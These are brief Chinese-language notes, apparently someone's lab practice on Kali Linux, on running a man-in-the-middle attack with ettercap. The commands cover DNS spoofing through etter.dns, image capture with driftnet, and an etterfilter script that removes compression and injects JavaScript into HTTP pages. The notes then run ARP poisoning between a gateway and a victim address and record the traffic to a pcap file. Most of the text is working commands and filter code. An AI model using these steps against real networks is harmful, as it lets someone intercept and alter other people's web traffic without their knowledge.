kali 3 ettercap

安装firefox

apt -y install firefox-esr-l10n-zh-cn
vi /etc/ettercap/etter.dns  # 修改映射

加入  (本机的ip)
* A 192.168.1.3   
* PTR 192.168.1.3

打开图形界面
ettercap -G
driftnet -i 网卡   弹出小监控
apt-get install driftnet
如 driftnet -i wlan0
# 数据篡改
# 使用etterfilter

1.首先我们介绍使用etterfilter编译filter并加载到ettercap对网络请求进行处理的方法,首先建立一个ig.filter文件,写入以下内容。


if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
        msg("change encoding");
    }
}

if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<head><script>alert('js inject')</script>");
        msg("inject head");
    }
}


2.使用etterfilter将filter文件编译成ef文件

etterfilter ig.filter -o ig.ef

3.在监听数据的同时加载过滤器

sudo ettercap -T -q -F ig.ef -M ARP:remote -w network.pcap /192.168.0.1//192.168.0.119/

4.尝试在受害者端使用浏览器访问未使用HTTPS的网站,例如http://m.ctrip.com,如果成功会看到网页弹窗。